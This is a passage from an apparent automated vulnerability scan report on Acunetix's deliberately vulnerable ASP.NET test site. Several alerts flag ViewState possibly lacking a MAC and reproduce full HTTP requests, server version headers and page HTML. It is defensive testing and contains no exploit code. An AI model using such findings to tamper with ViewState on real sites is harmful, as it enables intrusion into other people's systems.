href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Ensure the MAC is set for all pages on this website.

        3. GET http://testaspnet.vulnweb.com/about.aspx
          Alert tags
          Alert description

          *** EXPERIMENTAL ***

          This website uses ASP.NET's Viewstate but maybe without any MAC.

          Request
          Request line and header section (314 bytes)
          GET http://testaspnet.vulnweb.com/about.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 14467
          
          
          Response body (14467 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>About</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="about.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/2grLtTL+jO092JULZB++ks9UGJw==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<h1>About this website</h1>
          						<p>The website was built with the intention to test the Acunetix Web Vulnerability 
          							Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate 
          							the forementioned software's capabilities to find those bugs.</p>
          						<p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive 
          								information on this site. This includes e-mail addresses or real names.</b></p>
          						<h1>About Acunetix</h1>
          						<P><B>Combating the web vulnerability threat<BR>
          							</B>Securing a company's web applications is today's most overlooked aspect of 
          							securing the enterprise. Web application hacking is on the rise with as many as 
          							75% of cyber attacks done at web application level or via the web. Most 
          							corporations have secured their data at the network level, but have overlooked 
          							the crucial step of checking whether their web applications are vulnerable to 
          							attack. Web applications, which often have a direct line into the company's 
          							most valuable data assets, are online 24/7, completely unprotected by a 
          							firewall and therefore easy prey for attackers.</P>
          						<P>Acunetix was founded with this threat in mind. We realised the only way to 
          							combat web site hacking was to develop an automated tool that could help 
          							companies scan their web applications for vulnerabilities. In July 2005, 
          							Acunetix Web Vulnerability Scanner was released - a tool that crawls the 
          							website for vulnerabilities to SQL injection, cross site scripting and other 
          							web attacks before hackers do.</P>
          						<P>The Acunetix development team consists of highly experienced security developers 
          							who have each spent years developing network security scanning software prior 
          							to starting development on Acunetix WVS. The management team is backed by years 
          							of experience marketing and selling security software.</P>
          						<P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/">
          								offices</A> in Malta, US and the UK.
          						</P>
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Ensure the MAC is set for all pages on this website.

        4. GET http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Alert tags
          Alert description

          *** EXPERIMENTAL ***

          This website uses ASP.NET's Viewstate but maybe without any MAC.

          Request
          Request line and header section (322 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 13707
          
          
          Response body (13707 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk/TUy" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKDytHbBQKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q9zWSYY5iwxqgBHXlBfPJ/1TT/YMA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a>
          						<DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Ensure the MAC is set for all pages on this website.

        5. GET http://testaspnet.vulnweb.com/default.aspx
          Alert tags
          Alert description

          *** EXPERIMENTAL ***

          This website uses ASP.NET's Viewstate but maybe without any MAC.

          Request
          Request line and header section (316 bytes)
